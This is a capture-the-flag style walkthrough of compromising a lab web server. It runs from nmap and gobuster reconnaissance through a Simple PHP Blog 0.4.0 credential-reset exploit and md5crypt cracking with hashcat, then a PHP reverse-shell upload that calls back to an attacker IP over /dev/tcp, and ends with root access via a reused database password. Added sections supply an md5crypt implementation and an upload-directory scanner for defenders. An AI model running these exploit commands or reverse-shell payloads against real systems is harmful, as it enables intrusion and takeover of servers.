nmap -Pn -T4 10.10.10.1/24
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-06-04 15:24 ADT
Nmap scan report for 10.10.10.100
Host is up (0.00044s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 94:65:9C:41:A0:D7 (Intel Corporate)
Starting gobuster:
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.100 > /root/boxes/pwnos/reco.txt
2019/06/04 15:29:28 Starting gobuster
2019/06/04 15:30:30 Finished
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.100/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
=====================================================
/index (Status: 200)
/login (Status: 200)
/register (Status: 200)
/info (Status: 200)
/blog (Status: 301)
/includes (Status: 301)
/activate (Status: 302)
/server-status (Status: 403)
=====================================================
So going to the website:

Then Register:

Activate account:

And login:

Then nothing happens!

Not much for now.
Checking the blog directory:

In the source I see
<meta name="generator" content="Simple PHP Blog 0.4.0" />
Searching for exploit:
Simple PHP Blog 0.4 – ‘colors.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/cgi/webapps/26463.txt
Simple PHP Blog 0.4 – ‘preview_cgi.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/cgi/webapps/26461.txt
Simple PHP Blog 0.4 – ‘preview_static_cgi.php’ Multiple Cross-Site Scripting Vulnerabiliti | exploits/cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 – Multiple Remote s | exploits/php/webapps/1191.pl
Simple PHP Blog 0.4.0 – Remote Command Execution (Metasploit) | exploits/php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 – Remote Command Execution | exploits/php/webapps/1581.pl
The exploit 1191.pl is interesting. It can show the login/password hash:
I found $1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/
Trying to identify the format:
/usr/share/exploitdb# hashid '$1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/'
Analyzing '$1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/'
[+] MD5 Crypt
[+] Cisco-IOS(MD5)
[+] FreeBSD MD5
Then using hashcat:
hashcat -m 500 --force -a 0 -o craked hash /usr/share/wordlists/rockyou.txt
Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/
Time.Started.....: Wed Jun 5 12:50:27 2019 (26 secs)
Time.Estimated...: Wed Jun 5 12:50:53 2019 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4376 H/s (8.03ms) @ Accel:128 Loops:62 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 112640/14344385 (0.79%)
Rejected.........: 0/112640 (0.00%)
Restore.Point....: 112128/14344385 (0.78%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:992-1000
Candidates.#1....: ethan11 -> chambers1
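The `$1$` string hashid flagged is md5crypt, the format hashcat mode 500 targets. As an added illustration that is not from the original post, this Python reimplements the classic FreeBSD construction so a defender can see why it falls in seconds: a fixed 1000 MD5 rounds with no tunable cost, which is why `/etc/shadow` and application password stores should use sha512crypt, yescrypt or bcrypt instead. The salt is the one from the hash above; the `example-pass` password used in the checks is constructed.

```python
import hashlib
import hmac

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"

def _to64(value, count):  # crypt-style base64, low 6 bits first
    out = b""
    for _ in range(count):
        out += ITOA64[value & 0x3F:(value & 0x3F) + 1]
        value >>= 6
    return out

def md5crypt(password, salt):
    """Compute '$1$salt$digest' as crypt(3) and hashcat mode 500 do."""
    pw, salt = password.encode(), salt.encode()[:8]  # salt is at most 8 chars
    ctx = hashlib.md5(pw + MAGIC + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    for n in range(len(pw), 0, -16):  # mix in the alternate sum, 16 bytes at a time
        ctx.update(alt[:min(16, n)])
    n = len(pw)
    while n:  # one byte per bit of the password length
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):  # fixed 1000 rounds, which is why it cracks so fast
        h = hashlib.md5()
        h.update(pw if i & 1 else final)
        if i % 3:
            h.update(salt)
        if i % 7:
            h.update(pw)
        h.update(final if i & 1 else pw)
        final = h.digest()
    out = b""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return (MAGIC + salt + b"$" + out).decode()

def parse(h):
    """Split '$1$salt$digest' into (salt, digest); reject anything else."""
    parts = h.split("$")
    if len(parts) != 4 or parts[:2] != ["", "1"] or len(parts[3]) != 22:
        raise ValueError("not an md5crypt ($1$) hash")
    return parts[2], parts[3]

def verify(password, h):  # constant-time check of a candidate against a $1$ hash
    salt, _ = parse(h)
    return hmac.compare_digest(md5crypt(password, salt), h)
```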
In the meantime trying something else:
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U erik -P erik
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: erik
Password is set to: erik
I'm in!

Went to upload an image and uploaded the following PHP:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/443 0>&1'");?>
It worked!
Then on kali:
nc -lnvp 443
Then in the browser, I went to http://10.10.10.100/blog/images/reverse.php
Bingo!
nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.10.100] 36116
bash: no job control in this shell
www-data@web:/var/www/blog/images$
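The shell above landed because the blog accepted a PHP file through its image upload and the web server then executed it from /blog/images/. As an added defensive example that is not part of the original write-up, this Python scanner audits an upload directory for files that do not belong there: script extensions, files without image magic bytes, and PHP open tags hidden inside an otherwise valid image. The sample tree built by `demo()` is constructed.

```python
import os
import re
import tempfile

# An image directory should hold nothing but images: flag script extensions,
# files without image magic bytes, and any file carrying a PHP open tag.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
SCRIPT_EXT = {".php", ".php3", ".php5", ".phtml", ".phar"}

def inspect_file(path):
    """Return the findings for one file; an empty list means it looks like an image."""
    with open(path, "rb") as f:
        data = f.read()
    findings = []
    if os.path.splitext(path)[1].lower() in SCRIPT_EXT:
        findings.append("script extension in image directory")
    if not data.startswith(IMAGE_MAGIC):
        findings.append("no known image magic bytes")
    if PHP_TAG.search(data):  # a magic-byte check alone misses this case
        findings.append("contains PHP open tag")
    return findings

def scan_upload_dir(root):
    """Walk an upload tree and map each suspicious file (relative path) to its findings."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            findings = inspect_file(path)
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report

def demo():
    """Constructed sample tree: a plain JPEG, a PHP file, and a GIF with a PHP tail."""
    root = tempfile.mkdtemp(prefix="images-")
    samples = {
        "cat.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
        "reverse.php": b"<?php echo 'placeholder'; ?>",
        "logo.gif": b"GIF89a" + b"\x00" * 16 + b"<?php echo 1; ?>",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(content)
    return scan_upload_dir(root)
```

Pair the scan with turning off the PHP engine for the upload directory in the web server configuration, so a file that slips past the check is served as data rather than executed.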
Upgrade to a proper shell:
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL Z
stty raw -echo
fg and two times ENTER
export TERM=screen
reset
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now trying to escalate:
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Nothing in sudoers or SUID.
Tried different exploits... nothing.
Checking MySQL, as the password is in mysqli_connect.php:
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
mysql -u root -p
Then select do_system('id > tmp/out; chown www-data.www-data /tmp/out');
Didn't work... Missing UDF.
Tried to login as root using the same password:
BINGO!
/home$ su -
Password:
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~# cd /root
root@web:~# ll
total 32
drwx------ 4 root root 4096 2011-05-09 19:25 ./
drwxr-xr-x 21 root root 4096 2011-05-07 13:37 ../
drwx------ 2 root root 4096 2011-05-07 15:12 .aptitude/
-rw-r--r-- 1 root root 107 2011-05-09 19:29 .bash_history
-rw-r--r-- 1 root root 3106 2010-10-21 08:47 .bashrc
drwx------ 2 root root 4096 2011-05-07 17:18 .cache/
-rw-r--r-- 1 root root 0 2011-05-09 19:24 .mysql_history
-rw-r--r-- 1 root root 140 2010-10-21 08:47 .profile
-rw------- 1 root root 837 2011-05-09 19:16 .viminfo